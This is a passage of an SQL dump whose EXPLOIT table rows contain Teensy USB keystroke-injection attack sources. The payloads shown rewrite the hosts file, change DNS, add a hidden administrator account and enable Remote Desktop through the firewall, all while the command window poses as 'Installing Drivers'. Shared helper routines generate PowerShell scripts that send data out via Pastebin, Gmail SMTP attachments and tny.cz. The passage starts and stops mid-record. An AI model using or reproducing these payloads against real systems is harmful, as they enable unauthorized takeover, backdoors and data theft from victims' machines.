millisecs)\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.send_now();\u000dKeyboard.set_modifier(0);\u000dKeyboard.send_now();\u000ddelay(3000);\u000dKeyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\"");\u000ddelay(2000);\u000dKeyboard.set_modifier(MODIFIERKEY_CTRL);\u000dKeyboard.send_now();\u000dKeyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);\u000dKeyboard.send_now();\u000dKeyboard.set_key1(KEY_ENTER);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(7000);\u000dsend_left_enter();\u000ddelay(4000);\u000dcreate_click_capslock_win();\u000dcheck_for_capslock_success_teensy(reps,millisecs);\u000d}\u000d\u000dbool cmd(int reps, int millisecs, char *SomeCommand)\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.set_key1(KEY_R);\u000dKeyboard.send_now();\u000d\u000ddelay(500);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000d\u000dKeyboard.print(SomeCommand);\u000dKeyboard.set_key1(KEY_ENTER);\u000dKeyboard.send_now();\u000d\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000d\u000ddelay(3000);\u000dcreate_click_capslock_win();\u000dcheck_for_capslock_success_teensy(reps,millisecs);\u000d}\u000d\u000dvoid make_sure_capslock_is_off(void)\u000d{\u000dif (is_caps_on())\u000d{\u000ddelay(500);\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000ddelay(700);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(700);\u000d}\u000d}\u000d\u000dvoid create_click_capslock_win()\u000d{\u000dKeyboard.println("echo Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{CAPSLOCK}\" > %temp%\\capslock.vbs");\u000ddelay(400);\u000dKeyboard.println("wscript %temp%\\capslock.vbs");\u000ddelay(2000);\u000d}\u000d\u000dbool check_for_capslock_success_teensy(int reps, int millisecs)\u000d{\u000dunsigned int i = 0;\u000ddo\u000d{\u000ddelay(millisecs);\u000dif (is_caps_on())\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dreturn true;\u000d}\u000di++;\u000d}\u000dwhile (!is_caps_on() && (i<reps));\u000dreturn false;\u000d}\u000d\u000dvoid minimise_windows(void)\u000d{\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.set_key1(KEY_M);\u000dKeyboard.send_now();\u000ddelay(300);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(300);\u000d}\u000d\u000dvoid reset_windows_desktop(int sleep)\u000d{\u000ddelay(1000);\u000dminimise_windows();\u000ddelay(sleep);\u000dminimise_windows();\u000ddelay(sleep);\u000dminimise_windows();\u000ddelay(200);\u000d}\u000d\u000dvoid send_left_enter(){\u000d  delay(1000);\u000d  Keyboard.set_key1(KEY_LEFT);\u000d  Keyboard.send_now();\u000d  delay(100);\u000d  Keyboard.set_key1(0);\u000d  Keyboard.send_now();\u000d\u000d  Keyboard.set_key1(KEY_ENTER);\u000d  Keyboard.send_now();\u000d  delay(100);\u000d  Keyboard.set_key1(0);\u000d  Keyboard.send_now();\u000d  }\u000d\u000dvoid post(String filename)\u000d{\u000d    Keyboard.print("echo function pht($url,$pars) { >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht = New-Object -ComObject Msxml2.XMLHTTP >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.open(\"POST\", $url, $false) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Content-length\", $pars.length); >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Connection\", \"close\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.send($pars) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $script:sk=$ht.responseText }>> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid pastebin(String filename)\u000d{\u000d    post(filename);\u000d    Keyboard.print("echo pht \"https://pastebin.com/api/api_login.php\" \"api_dev_key=$dev&api_user_name=$user&api_user_password=$pass\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo pht \"https://pastebin.com/api/api_post.php\" \"api_user_key=$sk&api_option=paste&api_dev_key=$dev&api_paste_name=$pn&api_paste_code=$pv&api_paste_private=2\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid gmail(String filename, String filepath)\u000d{\u000d    post(filename);\u000d    Keyboard.print("echo $srv = \"smtp.gmail.com\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg = new-object Net.Mail.MailMessage >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st = new-object Net.Mail.SmtpClient($srv) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st.EnableSsl = $True >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st.Credentials = New-Object System.Net.NetworkCredential(\"$user\", \"$pass\"); >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.From = \"$user@gmail.com\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.To.Add(\"$user@gmail.com\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.Subject = $pn >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.Body = $pv >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    if (filepath != "no"){\u000d    \u000d        Keyboard.print("echo $att = new-object Net.Mail.Attachment(\"");\u000d        Keyboard.print (filepath);\u000d        Keyboard.print ("\") >> %temp%\\");\u000d        Keyboard.print(filename);\u000d        Keyboard.println(".ps1");\u000d        Keyboard.print("echo $msg.Attachments.Add($att) >> %temp%\\");\u000d        Keyboard.print(filename);\u000d        Keyboard.println(".ps1");\u000d    }\u000d    Keyboard.print("echo $st.Send($msg) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid tinypaste(String filename)\u000d{\u000d    post(filename);\u000d    //http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell\u000d    Keyboard.print("echo $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $utf8 = new-object -TypeName System.Text.UTF8Encoding >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $hash = [System.BitConverter]::ToString($md5.ComputeHash($utf8.GetBytes($pass))).Replace(\"-\", \"\").ToLower() >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo pht \"http://tny.cz/api/create.xml\" \"paste=$pv&title=$pn&is_code=0&is_private=1&authenticate=$user`:$hash\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d\u000d}\u000d','2013-07-18 00:00:00.000000','Keyboard Change the Default DNS Server (Windows)','TEENSY')
INSERT INTO EXPLOIT VALUES(6,'Nikhil "SamratAshok" Mittal','#define TEENSY<!--teensynumber-->\u000d#ifdef TEENSY2\u000d    #include<usb_private.h>\u000d#endif\u000dvoid setup(){\u000d  delay(3000);\u000d  wait_for_drivers(2000);\u000d\u000d  minimise_windows();\u000d  delay(500);\u000d  while(!cmd_admin(3,500))\u000d  {\u000d  reset_windows_desktop(2000);\u000d  }\u000d  Keyboard.println("echo <!--ipresolve--> <!--domainToResolve-->>>%systemroot%\\system32\\drivers\\etc\\hosts");\u000d  delay(2000);\u000d  Keyboard.println("exit");\u000d }\u000d\u000dvoid loop() {}\u000d\u000dvoid wait_for_drivers(int sleep)\u000d{\u000dbool CapsLockTrap = is_caps_on();\u000dwhile(CapsLockTrap == is_caps_on())\u000d{\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(sleep);\u000d}\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(sleep);\u000d}\u000d\u000dint ledkeys(void) {return int(keyboard_leds);}\u000d\u000dbool is_caps_on(void) {return ((ledkeys() & 2) == 2) ? true : false;}\u000d\u000dbool cmd_admin(int reps, int millisecs)\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.send_now();\u000dKeyboard.set_modifier(0);\u000dKeyboard.send_now();\u000ddelay(3000);\u000dKeyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\"");\u000ddelay(2000);\u000dKeyboard.set_modifier(MODIFIERKEY_CTRL);\u000dKeyboard.send_now();\u000dKeyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);\u000dKeyboard.send_now();\u000dKeyboard.set_key1(KEY_ENTER);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(7000);\u000dsend_left_enter();\u000ddelay(4000);\u000dcreate_click_capslock_win();\u000dcheck_for_capslock_success_teensy(reps,millisecs);\u000d}\u000d\u000dbool cmd(int reps, int millisecs, char *SomeCommand)\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.set_key1(KEY_R);\u000dKeyboard.send_now();\u000d\u000ddelay(500);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000d\u000dKeyboard.print(SomeCommand);\u000dKeyboard.set_key1(KEY_ENTER);\u000dKeyboard.send_now();\u000d\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000d\u000ddelay(3000);\u000dcreate_click_capslock_win();\u000dcheck_for_capslock_success_teensy(reps,millisecs);\u000d}\u000d\u000dvoid make_sure_capslock_is_off(void)\u000d{\u000dif (is_caps_on())\u000d{\u000ddelay(500);\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000ddelay(700);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(700);\u000d}\u000d}\u000d\u000dvoid create_click_capslock_win()\u000d{\u000dKeyboard.println("echo Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{CAPSLOCK}\" > %temp%\\capslock.vbs");\u000ddelay(400);\u000dKeyboard.println("wscript %temp%\\capslock.vbs");\u000ddelay(2000);\u000d}\u000d\u000dbool check_for_capslock_success_teensy(int reps, int millisecs)\u000d{\u000dunsigned int i = 0;\u000ddo\u000d{\u000ddelay(millisecs);\u000dif (is_caps_on())\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dreturn true;\u000d}\u000di++;\u000d}\u000dwhile (!is_caps_on() && (i<reps));\u000dreturn false;\u000d}\u000d\u000dvoid minimise_windows(void)\u000d{\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.set_key1(KEY_M);\u000dKeyboard.send_now();\u000ddelay(300);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(300);\u000d}\u000d\u000dvoid reset_windows_desktop(int sleep)\u000d{\u000ddelay(1000);\u000dminimise_windows();\u000ddelay(sleep);\u000dminimise_windows();\u000ddelay(sleep);\u000dminimise_windows();\u000ddelay(200);\u000d}\u000d\u000dvoid send_left_enter(){\u000d  delay(1000);\u000d  Keyboard.set_key1(KEY_LEFT);\u000d  Keyboard.send_now();\u000d  delay(100);\u000d  Keyboard.set_key1(0);\u000d  Keyboard.send_now();\u000d\u000d  Keyboard.set_key1(KEY_ENTER);\u000d  Keyboard.send_now();\u000d  delay(100);\u000d  Keyboard.set_key1(0);\u000d  Keyboard.send_now();\u000d  }\u000d\u000dvoid post(String filename)\u000d{\u000d    Keyboard.print("echo function pht($url,$pars) { >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht = New-Object -ComObject Msxml2.XMLHTTP >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.open(\"POST\", $url, $false) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Content-length\", $pars.length); >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Connection\", \"close\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.send($pars) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $script:sk=$ht.responseText }>> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid pastebin(String filename)\u000d{\u000d    post(filename);\u000d    Keyboard.print("echo pht \"https://pastebin.com/api/api_login.php\" \"api_dev_key=$dev&api_user_name=$user&api_user_password=$pass\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo pht \"https://pastebin.com/api/api_post.php\" \"api_user_key=$sk&api_option=paste&api_dev_key=$dev&api_paste_name=$pn&api_paste_code=$pv&api_paste_private=2\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid gmail(String filename, String filepath)\u000d{\u000d    post(filename);\u000d    Keyboard.print("echo $srv = \"smtp.gmail.com\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg = new-object Net.Mail.MailMessage >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st = new-object Net.Mail.SmtpClient($srv) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st.EnableSsl = $True >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st.Credentials = New-Object System.Net.NetworkCredential(\"$user\", \"$pass\"); >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.From = \"$user@gmail.com\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.To.Add(\"$user@gmail.com\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.Subject = $pn >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.Body = $pv >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    if (filepath != "no"){\u000d    \u000d        Keyboard.print("echo $att = new-object Net.Mail.Attachment(\"");\u000d        Keyboard.print (filepath);\u000d        Keyboard.print ("\") >> %temp%\\");\u000d        Keyboard.print(filename);\u000d        Keyboard.println(".ps1");\u000d        Keyboard.print("echo $msg.Attachments.Add($att) >> %temp%\\");\u000d        Keyboard.print(filename);\u000d        Keyboard.println(".ps1");\u000d    }\u000d    Keyboard.print("echo $st.Send($msg) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid tinypaste(String filename)\u000d{\u000d    post(filename);\u000d    //http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell\u000d    Keyboard.print("echo $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $utf8 = new-object -TypeName System.Text.UTF8Encoding >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $hash = [System.BitConverter]::ToString($md5.ComputeHash($utf8.GetBytes($pass))).Replace(\"-\", \"\").ToLower() >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo pht \"http://tny.cz/api/create.xml\" \"paste=$pv&title=$pn&is_code=0&is_private=1&authenticate=$user`:$hash\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d\u000d}\u000d','2013-07-18 00:00:00.000000','Keyboard Edit the Host File (Windows)','TEENSY')
INSERT INTO EXPLOIT VALUES(7,'Nikhil "SamratAshok" Mittal','#define TEENSY<!--teensynumber-->\u000d#ifdef TEENSY2\u000d    #include<usb_private.h>\u000d#endif\u000d\u000d# define PAYLOAD_USER_ADD "net user <!--user--> <!--password--> /add"\u000d# define PAYLOAD_GROUP_ADD "net localgroup Administrators <!--user--> /add"\u000d\u000dvoid setup(){\u000d delay(3000);\u000d  wait_for_drivers(2000);\u000d\u000d  minimise_windows();\u000d  delay(500);\u000d  while(!cmd_admin(3,500))\u000d  {\u000d  reset_windows_desktop(2000);\u000d  }\u000dadd_user();\u000dKeyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f");\u000ddelay(2000);\u000dKeyboard.println("reg add \"HKLM\\System\\CurrentControlSet\\Services\\TermService\" /v Start /t REG_DWORD /d 2 /f");\u000ddelay(2000);\u000dKeyboard.println("sc start termservice");\u000ddelay(2000);\u000dKeyboard.println("netsh firewall set service type = remotedesktop mode = enable");\u000ddelay(3000);\u000dKeyboard.println("exit");\u000d}\u000d\u000dvoid loop(){\u000d}\u000d\u000dvoid add_user(){\u000ddelay(2000);\u000dKeyboard.println(PAYLOAD_USER_ADD);\u000ddelay(2000);\u000dKeyboard.println(PAYLOAD_GROUP_ADD);\u000ddelay(1000);\u000d\u000d}\u000d\u000dvoid wait_for_drivers(int sleep)\u000d{\u000dbool CapsLockTrap = is_caps_on();\u000dwhile(CapsLockTrap == is_caps_on())\u000d{\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(sleep);\u000d}\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(sleep);\u000d}\u000d\u000dint ledkeys(void) {return int(keyboard_leds);}\u000d\u000dbool is_caps_on(void) {return ((ledkeys() & 2) == 2) ? true : false;}\u000d\u000dbool cmd_admin(int reps, int millisecs)\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.send_now();\u000dKeyboard.set_modifier(0);\u000dKeyboard.send_now();\u000ddelay(3000);\u000dKeyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\"");\u000ddelay(2000);\u000dKeyboard.set_modifier(MODIFIERKEY_CTRL);\u000dKeyboard.send_now();\u000dKeyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);\u000dKeyboard.send_now();\u000dKeyboard.set_key1(KEY_ENTER);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(7000);\u000dsend_left_enter();\u000ddelay(4000);\u000dcreate_click_capslock_win();\u000dcheck_for_capslock_success_teensy(reps,millisecs);\u000d}\u000d\u000dbool cmd(int reps, int millisecs, char *SomeCommand)\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.set_key1(KEY_R);\u000dKeyboard.send_now();\u000d\u000ddelay(500);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000d\u000dKeyboard.print(SomeCommand);\u000dKeyboard.set_key1(KEY_ENTER);\u000dKeyboard.send_now();\u000d\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000d\u000ddelay(3000);\u000dcreate_click_capslock_win();\u000dcheck_for_capslock_success_teensy(reps,millisecs);\u000d}\u000d\u000dvoid make_sure_capslock_is_off(void)\u000d{\u000dif (is_caps_on())\u000d{\u000ddelay(500);\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000ddelay(700);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(700);\u000d}\u000d}\u000d\u000dvoid create_click_capslock_win()\u000d{\u000dKeyboard.println("echo Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{CAPSLOCK}\" > %temp%\\capslock.vbs");\u000ddelay(400);\u000dKeyboard.println("wscript %temp%\\capslock.vbs");\u000ddelay(2000);\u000d}\u000d\u000dbool check_for_capslock_success_teensy(int reps, int millisecs)\u000d{\u000dunsigned int i = 0;\u000ddo\u000d{\u000ddelay(millisecs);\u000dif (is_caps_on())\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dreturn true;\u000d}\u000di++;\u000d}\u000dwhile (!is_caps_on() && (i<reps));\u000dreturn false;\u000d}\u000d\u000dvoid minimise_windows(void)\u000d{\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.set_key1(KEY_M);\u000dKeyboard.send_now();\u000ddelay(300);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(300);\u000d}\u000d\u000dvoid reset_windows_desktop(int sleep)\u000d{\u000ddelay(1000);\u000dminimise_windows();\u000ddelay(sleep);\u000dminimise_windows();\u000ddelay(sleep);\u000dminimise_windows();\u000ddelay(200);\u000d}\u000d\u000dvoid send_left_enter(){\u000d  delay(1000);\u000d  Keyboard.set_key1(KEY_LEFT);\u000d  Keyboard.send_now();\u000d  delay(100);\u000d  Keyboard.set_key1(0);\u000d  Keyboard.send_now();\u000d\u000d  Keyboard.set_key1(KEY_ENTER);\u000d  Keyboard.send_now();\u000d  delay(100);\u000d  Keyboard.set_key1(0);\u000d  Keyboard.send_now();\u000d  }\u000d\u000dvoid post(String filename)\u000d{\u000d    Keyboard.print("echo function pht($url,$pars) { >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht = New-Object -ComObject Msxml2.XMLHTTP >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.open(\"POST\", $url, $false) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Content-length\", $pars.length); >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Connection\", \"close\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.send($pars) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $script:sk=$ht.responseText }>> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid pastebin(String filename)\u000d{\u000d    post(filename);\u000d    Keyboard.print("echo pht \"https://pastebin.com/api/api_login.php\" \"api_dev_key=$dev&api_user_name=$user&api_user_password=$pass\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo pht \"https://pastebin.com/api/api_post.php\" \"api_user_key=$sk&api_option=paste&api_dev_key=$dev&api_paste_name=$pn&api_paste_code=$pv&api_paste_private=2\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid gmail(String filename, String filepath)\u000d{\u000d    post(filename);\u000d    Keyboard.print("echo $srv = \"smtp.gmail.com\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg = new-object Net.Mail.MailMessage >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st = new-object Net.Mail.SmtpClient($srv) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st.EnableSsl = $True >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st.Credentials = New-Object System.Net.NetworkCredential(\"$user\", \"$pass\"); >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.From = \"$user@gmail.com\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.To.Add(\"$user@gmail.com\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.Subject = $pn >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.Body = $pv >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    if (filepath != "no"){\u000d    \u000d        Keyboard.print("echo $att = new-object Net.Mail.Attachment(\"");\u000d        Keyboard.print (filepath);\u000d        Keyboard.print ("\") >> %temp%\\");\u000d        Keyboard.print(filename);\u000d        Keyboard.println(".ps1");\u000d        Keyboard.print("echo $msg.Attachments.Add($att) >> %temp%\\");\u000d        Keyboard.print(filename);\u000d        Keyboard.println(".ps1");\u000d    }\u000d    Keyboard.print("echo $st.Send($msg) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid tinypaste(String filename)\u000d{\u000d    post(filename);\u000d    //http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell\u000d    Keyboard.print("echo $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $utf8 = new-object -TypeName System.Text.UTF8Encoding >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $hash = [System.BitConverter]::ToString($md5.ComputeHash($utf8.GetBytes($pass))).Replace(\"-\", \"\").ToLower() >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo pht 